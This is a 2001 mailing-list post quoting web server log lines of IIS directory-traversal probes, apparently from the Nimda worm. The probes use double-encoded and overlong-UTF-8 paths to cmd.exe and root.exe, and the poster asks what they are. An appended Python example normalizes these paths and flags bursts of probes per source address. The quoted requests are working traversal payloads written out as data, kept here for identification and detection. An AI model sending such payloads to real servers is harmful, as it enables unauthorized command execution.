From: Rob 'Feztaa' Park (fezzikerhome.com)
Date: Thu Oct 04 2001 - 23:15:07 CDT


    Is this some kind of new worm, or is this part of Nimda?

    ...
    24.79.126.53 - - [04/Oct/2001:22:04:45 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    24.79.126.53 - - [04/Oct/2001:22:04:48 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    24.79.126.53 - - [04/Oct/2001:22:04:50 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 43 "-" "-"
    24.79.126.53 - - [04/Oct/2001:22:04:53 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    ...

    I think that's pretty messed up that all 10 of those happened within 7
    seconds of each other... My logs are full of this crud.

    Thanks in advance :)

    -- 
    Rob 'Feztaa' Park
    fezzikerhome.com
    --
    Your mouse has moved. Windows NT must be restarted for the change to take
    effect. Reboot now? [ OK ]
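
Added example, not part of the original post: one way to triage a burst like the one quoted above is to normalize each request path (percent-decode twice, then fold the two-byte overlong sequences as a lenient decoder would) and count probes per source address inside a time window. The function names, the threshold and window values, and the 192.0.2.10 line are assumptions of this example; the other sample lines are taken from the post.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_to_bytes

# Five request lines from the post plus one constructed benign request (192.0.2.10).
SAMPLE = r'''
24.79.126.53 - - [04/Oct/2001:22:04:45 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:50 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:53 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
192.0.2.10 - - [04/Oct/2001:22:05:10 -0600] "GET /index.html HTTP/1.0" 200 512 "-" "-"
'''.strip().splitlines()

LOG = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)')
SHELLS = ("cmd.exe", "root.exe")

def normalize(target):
    """Return the request path with encoded separators made visible."""
    path = target.split("?", 1)[0]
    raw = unquote_to_bytes(unquote_to_bytes(path))  # %255c -> %5c -> backslash
    # Fold 2-byte overlong forms (lead byte 0xC0/0xC1) down to the ASCII byte
    # they stand for, e.g. %c0%af -> '/', %c1%1c -> '\'.
    fold = lambda m: bytes([((m[0][0] & 1) << 6) | (m[1][0] & 0x3F)])
    raw = re.sub(rb"[\xc0\xc1](.)", fold, raw, flags=re.S)
    return raw.decode("latin-1").replace("\\", "/").lower()

def is_probe(target):
    """True if the path traverses upward or names a command interpreter."""
    p = normalize(target)
    return "/../" in p or p.rsplit("/", 1)[-1] in SHELLS

def bursts(lines, threshold=5, window=10):
    """Map source address -> most probes seen in any `window`-second span."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG.match(line.strip())
        if m and is_probe(m.group(3)):
            hits[m.group(1)].append(
                datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z"))
    span, found = timedelta(seconds=window), {}
    for ip, ts in hits.items():
        ts.sort()
        best = max(sum(t - start <= span for t in ts[i:])
                   for i, start in enumerate(ts))
        if best >= threshold:
            found[ip] = best
    return found

if __name__ == "__main__":
    print(bursts(SAMPLE))
```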